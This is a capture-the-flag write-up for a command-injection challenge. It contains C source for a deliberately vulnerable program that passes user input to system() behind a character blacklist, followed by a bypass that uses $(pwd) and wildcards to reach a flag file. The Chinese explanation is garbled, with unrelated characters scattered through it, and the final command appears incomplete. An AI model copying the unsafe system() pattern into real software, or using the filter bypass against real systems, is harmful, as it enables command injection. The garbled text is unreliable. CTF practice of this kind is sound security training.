#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
本題關(guān)鍵在于繞過(guò)'/'的過(guò)濾斗忌,可以用$(pwd)這個(gè)環(huán)境變量繞過(guò)犹赖,結(jié)合通配符即可繞過(guò)第晰。
cd /
echo $(pwd) 此時(shí)pwd為當(dāng)前路徑开缎,即'/'
/home/cmd2/cmd2 '$(pwd)home$(pwd)cmd2$(pwd)fl?g'